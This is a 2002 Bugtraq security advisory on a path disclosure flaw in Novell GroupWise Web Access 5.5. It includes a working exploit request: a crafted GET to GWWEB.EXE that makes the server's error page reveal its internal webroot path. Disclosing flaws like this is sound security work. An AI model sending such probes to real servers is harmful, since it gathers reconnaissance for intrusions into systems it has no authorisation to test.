[24462] in bugtraq
SecurityOffice Security Advisory:// Novell GroupWise Web Access Path Disclosure Vulnerability
daemon@ATHENA.MIT.EDU (Tamer Sahin)
Fri Mar 1 00:30:05 2002
Message-ID: <000901c1bfe6$d75b9050$788f83d9@ts>
Reply-To: "Tamer Sahin" <ts@securityoffice.net>
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Date: Thu, 28 Feb 2002 01:31:10 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Novell GroupWise Web Access Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 28, 2002
Product / Vendor:
Novell GroupWise, the premier communication and collaboration tool
for the one Net environment, helps you tackle some of the toughest
business challenges you face. Whether your organization is small,
midsize or large, your employees need e-mail, calendaring, document
management and other collaborative tools to open up the lines of
communication and keep your business running efficiently.
http://www.novell.com/products/groupwise/
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the GroupWise
Web Access.
Exploit:
GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0
HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close
Could not find file
SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM
Tested:
Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5
Vulnerable:
GroupWise Web Access 5.5 (And may be other.)
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPH1sPLuLpFMrXtywEQJzlgCfTn8RnbkHJDYUkbt28B4gT58Jpp4AoMzT
SQKOfafzkyXrQUMO9bw80DMN
=w9Rd
-----END PGP SIGNATURE-----
